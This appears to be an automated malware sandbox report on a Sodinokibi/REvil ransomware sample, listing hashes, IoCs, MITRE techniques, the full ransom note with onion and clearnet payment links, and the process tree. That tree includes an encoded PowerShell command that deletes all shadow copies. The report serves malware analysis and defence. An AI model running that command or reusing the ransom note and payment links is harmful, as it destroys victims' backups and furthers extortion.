sodinokibi | 7aaf4b2e40306cbb65edd0aed85a61ef4bbe538837684f48eafefebbdb871c11

General

Target

2d5012a0dcdb72409842b4606ec0ac48_JaffaCakes118.dll
Size

166KB
MD5

2d5012a0dcdb72409842b4606ec0ac48
SHA1

c6044b3b1d6b65be9fbec84846efa25cd8c30242
SHA256

7aaf4b2e40306cbb65edd0aed85a61ef4bbe538837684f48eafefebbdb871c11
SHA512

3f837cee85d9136cbbfce1cb13fd855d10893b8d898123930c46b99ebb4ed4a5c2d0a4f653e403b1f5f0b26601f330ac1d9c95766dc7e1483e393ee1919eb64b
SSDEEP

3072:MJMawtnGqtWoKeZ9fh1CgnNto6jfRWQwOy8CwvD:Ww9vteqJggn7oUfRWoyBwv

Score

10^/10

sodinokibi ransomware

Malware Config

Extracted

Path

C:\Recovery\98cewz97v5-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 98cewz97v5. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/322748F3E378EF88 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/322748F3E378EF88 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: +Y0DFsETFsJOLMPLpBP6sgANjeSVr4xeHLdh737DnrNhDs2WXhKH2cUr5kFxmHo3 ymxdAguT6dJpz6M7QOEJvFmUGwXBkdbO+JGuuH2jP4EO5giOTIFRn2c2pQyGdlQw cVeiiAqv2eOaW4v33qVMLwaWNfV5YFDG8El8HpBBH0t2yucTBrEsyknuLnZuGd8O /fG25t8h8znLwvclK6RivuceDt4e/DAjs7w2/nwLXAO1gHA51NUDh4UT82J+rL+v x0t9OpYwVJGgt0/5IdTwkhxWJ4eS44BU8husxqpxZ2GP5ynvZVjRJje04poqXU8x vVsQOXt5Ze3SfF+AZTe84A3hsS4uGHSIcwiX7IIW6dhqJyedjeu7wH3ugJ/6z5rR 46j6oRgNAv3InwR0Z4M+I+t5zJmuHo3TZZUbCarSNGb7Iw6HMwwbCdPY11DQ6FZj X1+XwtQ5ylgU7Fc1pENwVPmrYIvpvhka+Gie4UKYPHRK83U6mhppVmpDJR12IQ+j Tc52Dy5BT+GgP+3t90BDEP4KAemKDpCRn38epuFdL6xLi6WNbDkKryXht2gUtbTF tdSeW9C/8cJn1bTumDqZ2rBnqt+5CiM7M4kGeJYSd5+W2MjfIC5kZCBWgtvDDwxA SwayuL8isaQVYRnfirW22/+rFsBS5ElSinf1M3wP+zlDayCly71OJwNZk7dAUAlW T60sLGeOM7mvjOKg7NGjcG6+iptMg8hku86r1mUtnnc8QN7rcDxtvzgUP5vjKuJJ wy2DfCgxM1X+pC81Y2Y1xZOy4WDYNqQFvV6xpsUpn1uaquB6+xbfx+NF4YJIoGBS LWLF/PSkkTa5EY2uueBWASFhYvswSYvLUc5TshlIixHau5C7qwZ9jw67NB+EjIVB 79irL7QklH+Pf8+1TQ+tJJP4Dfjvb+Wwrl0n43pQkoGXMgxpG1yutKts3kmTTrLW xVDO24/7bMcufn7+FqKOmcMWVP8qGoPkpLDxmSOpPxmFdVK03+XwsRuaaLNg/Osq 4G6JOt0yo3hRMF9y2lk8AfmIhMuCwKBlT+qCAoKK7FpkWVB7fVWga8udmwnkMCsJ wNbGylnxS01bcDxOUQvbzi1p7cNdnn4lA2gSULGYrYvarwAsfEVduONyLaUyXNhL jPGOz/OvI7QYWekdXMQtbhUuLJnJCgT4GmqLFdXjXzd51GFmIXR/AKzphjaTyYva /JGkFf75i84dAOSQHuJS3mQkZzB9pLATEGv2Wz12gGQk+ppurH7F7OAmHw/i/wjO 4AQArfD6WvEJz9vifWirqMT3zKMslWsL0pudQEvdkUMIIMY0KN8FrcPq4ztKPTwC 3PGUlDWZlg1CreeAqXaWSnJIxMGo+L9s22AkJ9IOdTmP9CVq0Gw= Extension name: 98cewz97v5 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/322748F3E378EF88

http://decryptor.cc/322748F3E378EF88

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\L:	rundll32.exe
File opened (read-only)	\??\N:	rundll32.exe
File opened (read-only)	\??\S:	rundll32.exe
File opened (read-only)	\??\T:	rundll32.exe
File opened (read-only)	\??\V:	rundll32.exe
File opened (read-only)	\??\G:	rundll32.exe
File opened (read-only)	\??\E:	rundll32.exe
File opened (read-only)	\??\K:	rundll32.exe
File opened (read-only)	\??\W:	rundll32.exe
File opened (read-only)	\??\I:	rundll32.exe
File opened (read-only)	\??\R:	rundll32.exe
File opened (read-only)	\??\H:	rundll32.exe
File opened (read-only)	\??\J:	rundll32.exe
File opened (read-only)	\??\X:	rundll32.exe
File opened (read-only)	\??\Z:	rundll32.exe
File opened (read-only)	\??\M:	rundll32.exe
File opened (read-only)	\??\O:	rundll32.exe
File opened (read-only)	\??\Q:	rundll32.exe
File opened (read-only)	\??\U:	rundll32.exe
File opened (read-only)	\??\F:	rundll32.exe
File opened (read-only)	\??\A:	rundll32.exe
File opened (read-only)	\??\D:	rundll32.exe
File opened (read-only)	\??\B:	rundll32.exe
File opened (read-only)	\??\P:	rundll32.exe
File opened (read-only)	\??\Y:	rundll32.exe

Drops file in Program Files directory 21 IoCs

description	ioc	Process
File opened for modification	\??\c:\program files\UnblockReceive.dotx	rundll32.exe
File opened for modification	\??\c:\program files\AssertBackup.vstx	rundll32.exe
File opened for modification	\??\c:\program files\GetSync.xlsb	rundll32.exe
File opened for modification	\??\c:\program files\ImportUninstall.mpg	rundll32.exe
File opened for modification	\??\c:\program files\NewImport.jpg	rundll32.exe
File opened for modification	\??\c:\program files\OutClose.doc	rundll32.exe
File opened for modification	\??\c:\program files\ResetDisable.xlsx	rundll32.exe
File opened for modification	\??\c:\program files\ResolveDebug.ADT	rundll32.exe
File created	\??\c:\program files (x86)\98cewz97v5-readme.txt	rundll32.exe
File opened for modification	\??\c:\program files\CompareEnter.otf	rundll32.exe
File opened for modification	\??\c:\program files\GrantResume.vsd	rundll32.exe
File opened for modification	\??\c:\program files\MeasureRedo.ppsm	rundll32.exe
File opened for modification	\??\c:\program files\SelectMerge.txt	rundll32.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\98cewz97v5-readme.txt	rundll32.exe
File opened for modification	\??\c:\program files\InstallMerge.crw	rundll32.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\98cewz97v5-readme.txt	rundll32.exe
File created	\??\c:\program files\98cewz97v5-readme.txt	rundll32.exe
File opened for modification	\??\c:\program files\ApprovePush.avi	rundll32.exe
File opened for modification	\??\c:\program files\PushUnpublish.dwg	rundll32.exe
File opened for modification	\??\c:\program files\RegisterRestart.dotx	rundll32.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\v3.5\98cewz97v5-readme.txt	rundll32.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2212	rundll32.exe
2996	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	2212	rundll32.exe
Token: SeDebugPrivilege	2996	powershell.exe
Token: SeBackupPrivilege	2708	vssvc.exe
Token: SeRestorePrivilege	2708	vssvc.exe
Token: SeAuditPrivilege	2708	vssvc.exe
Token: SeTakeOwnershipPrivilege	2212	rundll32.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 1776 wrote to memory of 2212	1776	rundll32.exe	28
PID 1776 wrote to memory of 2212	1776	rundll32.exe	28
PID 1776 wrote to memory of 2212	1776	rundll32.exe	28
PID 1776 wrote to memory of 2212	1776	rundll32.exe	28
PID 1776 wrote to memory of 2212	1776	rundll32.exe	28
PID 1776 wrote to memory of 2212	1776	rundll32.exe	28
PID 1776 wrote to memory of 2212	1776	rundll32.exe	28
PID 2212 wrote to memory of 2996	2212	rundll32.exe	29
PID 2212 wrote to memory of 2996	2212	rundll32.exe	29
PID 2212 wrote to memory of 2996	2212	rundll32.exe	29
PID 2212 wrote to memory of 2996	2212	rundll32.exe	29

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\2d5012a0dcdb72409842b4606ec0ac48_JaffaCakes118.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:1776
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\2d5012a0dcdb72409842b4606ec0ac48_JaffaCakes118.dll,#1
  2⤵
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2212
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2996

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3016

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Recovery\98cewz97v5-readme.txt

Filesize
7KB

MD5
49a1ae4ea179ad76520477bbf9e79cf5

SHA1
a96210d9a6440d6928a658680e278816795eba9e

SHA256
12c70fc0ac4f81113f7b8562cb8ee183b0a48cca788dfd4eea717adc324f5bdf

SHA512
68feb1b4e7516b90cdac5dc2525d2e1c0785fc3567934fb3104638e58eb736da5acdd6821498d6748134017505ce18cbce2037e6699b96e6bf2738677efc8d84

Download Submit
memory/2996-4-0x000007FEF5DBE000-0x000007FEF5DBF000-memory.dmp

Filesize
4KB

Download
memory/2996-5-0x000000001B770000-0x000000001BA52000-memory.dmp

Filesize
2.9MB

Download
memory/2996-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2996-7-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp

Filesize
9.6MB

Download
memory/2996-8-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp

Filesize
9.6MB

Download
memory/2996-9-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp

Filesize
9.6MB

Download
memory/2996-10-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp

Filesize
9.6MB

Download
memory/2996-11-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp

Filesize
9.6MB

Download
memory/2996-12-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing